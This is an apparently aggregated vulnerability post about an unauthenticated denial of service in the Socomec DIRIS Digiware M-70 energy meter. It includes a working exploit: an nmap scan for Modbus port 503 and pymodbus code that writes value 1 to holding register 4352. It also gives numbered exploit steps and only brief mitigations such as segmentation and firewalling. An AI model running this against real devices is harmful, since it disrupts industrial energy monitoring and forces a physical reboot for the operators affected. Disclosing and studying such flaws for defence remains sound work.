Listen to this Post
This vulnerability exploits the Modbus TCP and Modbus RTU over TCP services in the Socomec DIRIS Digiware M-70 energy meter. The attack is an unauthenticated denial of service triggered by sending a specific malformed Modbus packet. The device listens on its standard Modbus TCP port, 503/TCP. An attacker sends a single Modbus “Write Single Register” request (function code 6) targeting holding register address 4352. The payload writes the value ‘1’ to this register. This specific write operation corrupts the device’s internal Modbus address configuration, changing it to address 15. This corruption causes a critical fault in the device’s network service stack, rendering the Modbus service completely unresponsive. The device enters a persistent denial-of-service state, requiring a physical reboot to restore functionality, as all subsequent network communication attempts fail.
Platform: Socomec DIRIS Digiware
Version: M-70 1.6.9
Vulnerability: Denial of Service
Severity: Critical
date: 12/01/2025
Prediction: Unpatched as of 12/05/2025
What Undercode Say:
nmap -p 503 --open 192.168.1.0/24
from pymodbus.client import ModbusTcpClient
client = ModbusTcpClient('192.168.1.10', port=503)
client.write_register(4352, 1, unit=0x01)
curl http://192.168.1.10 -m 2
How Exploit:
1. Discover target device on port 503/TCP.
- Send crafted Modbus packet (Function 6, Register 4352, Value 1).
3. Device Modbus service crashes permanently.
Protection from this CVE:
1. Network segmentation.
2. Firewall block port 503.
3. Physical access control.
Impact:
Device unresponsiveness requiring hard reboot.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
